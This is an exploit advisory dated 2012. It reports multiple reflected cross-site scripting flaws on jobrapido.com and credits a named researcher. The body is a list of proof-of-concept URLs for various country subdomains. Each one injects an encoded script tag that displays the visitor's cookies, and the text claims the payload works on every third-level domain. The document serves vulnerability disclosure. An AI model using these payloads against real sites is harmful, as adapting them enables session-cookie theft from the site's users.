+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title           : Jobrapido.com Multiple XSS 
# Date                    : 07-03-2012
# Author                  : Ivano Binetti (http://www.ivanobinetti.com)
# Web site                : http://www.jobrapido.com
# Web master notification : 07/11/2011

+--------------------------------------------------------------------------------------------------------------------------------+

PoC:
http://us.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://uk.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://it.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ae.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ao.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ar.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://at.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://au.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://be.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://br.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ca.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

This Poc works for all third-level domains.


 
+--------------------------------------------------------------------------------------------------------------------------------+